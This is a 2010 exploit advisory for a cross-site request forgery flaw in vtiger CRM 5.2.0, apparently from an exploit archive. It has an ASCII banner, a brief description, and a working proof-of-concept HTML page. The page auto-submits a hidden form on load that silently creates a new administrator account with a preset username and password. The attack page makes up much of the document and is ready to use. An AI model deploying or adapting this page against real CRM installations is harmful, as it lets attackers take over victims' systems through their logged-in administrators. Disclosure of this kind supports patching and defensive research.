vtiger CRM version 5.2.0 cross site request forgery exploit.
c059ad8297a297d821f25b04a3f044e11bd8ab9aeb6085809dedda0583cecb55
<!--=========================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Cross-site Request Forgery #
# Software.................vtiger CRM 5.2.0 #
# Download.................http://sourceforge.net/projects/vtigercrm/files/ #
# Date.....................5/21/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# A cross-site request forgery vunlerability in vtiger CRM 5.2.0 can be exploited to create an new admin. #
# The form values can also be sent via GET request, but the resulting user does not have admin privileges. #
# #
# #
# ##Proof of Concept## -->
<html>
<body onload="document.forms[0].submit()">
<form name="EditView" method="post" action="http://localhost/index.php">
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="mode" value="create" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="user_name" value="new_user" />
<input type="hidden" name="is_admin" value="on" />
<input type="hidden" name="user_password" value="new_password" />
<input type="hidden" name="confirm_password" value="new_password" />
<input type="hidden" name="email1" value="test@test.com" />
<input type="hidden" name="status" value="Active" />
</form>
</body>
</html>